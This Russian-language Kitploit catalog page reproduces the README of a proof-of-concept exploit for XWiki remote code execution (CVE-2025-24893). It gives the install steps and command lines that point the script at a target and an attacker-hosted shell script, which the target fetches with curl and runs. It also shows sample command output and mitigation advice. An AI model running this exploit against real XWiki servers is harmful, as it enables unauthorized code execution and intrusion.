Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
xwiki-cve-2025-24893-poc — PoC для CVE-2025-24893 | Kitploit
Инструменты/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

PoC для CVE-2025-24893

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
311 год назадЕщё не проверено

PoC эксплуатации XWiki RCE (CVE-2025-24893)

Обзор

Этот репозиторий содержит Proof of Concept (PoC) эксплойт для уязвимости удаленного выполнения кода (RCE) в XWiki, идентифицированной как CVE-2025-24893. Уязвимость позволяет злоумышленнику выполнить произвольный код на целевой системе XWiki путем отправки специально сформированного запроса к конечной точке SolrSearch. Скрипт поддерживает как HTTP, так и HTTPS цели.

⚠️ Отказ от ответственности: Данный PoC предназначен только для образовательных и исследовательских целей. Несанкционированное использование этого кода против систем без явного разрешения незаконно и неэтично. Всегда получайте надлежащее разрешение перед тестированием любой системы.

Детали уязвимости

  • CVE ID: CVE-2025-24893
  • Затронутый компонент: конечная точка SolrSearch в XWiki
  • Влияние: Удаленное выполнение кода (RCE)
  • Рекомендации: GitHub Security Advisory

Уязвимость возникает из-за неправильной обработки пользовательского ввода в конечной точке SolrSearch, что позволяет внедрить Groovy-код через специально созданную полезную нагрузку. Данный PoC демонстрирует, как злоумышленник может использовать это для выполнения произвольных команд на целевом сервере.

Предварительные требования

  • Python 3.x
  • Необходимые библиотеки Python: requests, argparse, urllib.parse, re, html
  • Целевая система XWiki, уязвимая к CVE-2025-24893
  • Сервер под контролем атакующего для хостинга bash-скрипта, доступный по HTTP или HTTPS
  • Файл с кодом, который будет выполнен на цели

Установка

  1. Клонируйте этот репозиторий:
    root@kitploit:~
    git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
    
  2. Установите необходимые библиотеки Python:
    root@kitploit:~
    pip install requests
    

Использование

Скрипт отправляет специально сформированный HTTP/HTTPS-запрос к целевой системе XWiki, внедряя полезную нагрузку Groovy, которая выполняет команду curl для загрузки и запуска файла с сервера атакующего.

Запустите скрипт следующей командой:

root@kitploit:~
python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]

Аргументы

  • --url: Базовый URL целевой системы XWiki (например, http://target или https://target).
  • --server: IP-адрес или имя хоста сервера атакующего, включая порт, если необходимо (например, 192.168.1.100:8080). Поддерживает как HTTP, так и HTTPS.
  • --file: Имя файла на сервере атакующего, содержащего код для выполнения (например, exploit.sh).
  • --no-verify: Необязательный флаг для отключения проверки SSL для HTTPS-целей (используйте с осторожностью, только для тестирования).

Пример

root@kitploit:~
python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh

Для обхода проверки SSL (например, для самоподписанных сертификатов):

root@kitploit:~
python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify

Это приведет к:

  1. Формированию полезной нагрузки, использующей Groovy-скрипт для выполнения команды curl.
  2. Загрузке указанного файла (exploit.sh) с сервера атакующего (http(s)://192.168.1.100:8080).
  3. Выполнению загруженного файла на целевой системе.
  4. Извлечению и отображению вывода с очисткой от HTML-тегов и сущностей.

Вывод

Скрипт извлекает ответ от цели, удаляет HTML-теги (например, <br/>, <del>) и преобразует HTML-сущности в обычный текст для удобочитаемости. Очищенный вывод выводится на консоль.

Пример

root@kitploit:~
python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

Ограничения

  • Целевая система XWiki должна быть уязвима к CVE-2025-24893.
  • Сервер атакующего должен быть доступен с целевой системы по HTTP или HTTPS.
  • Скрипт предполагает, что целевой сервер поддерживает конечную точку SolrSearch и выполнение Groovy.

Меры защиты

Для защиты от этой уязвимости:

  • Обновите XWiki до последней исправленной версии.
  • Обратитесь к GitHub Security Advisory за подробными шагами по смягчению.
  • Блог для справки CVE-2025-24893

Лицензия

Этот проект лицензирован по лицензии MIT. Подробнее см. в файле LICENSE.

Скачать инструмент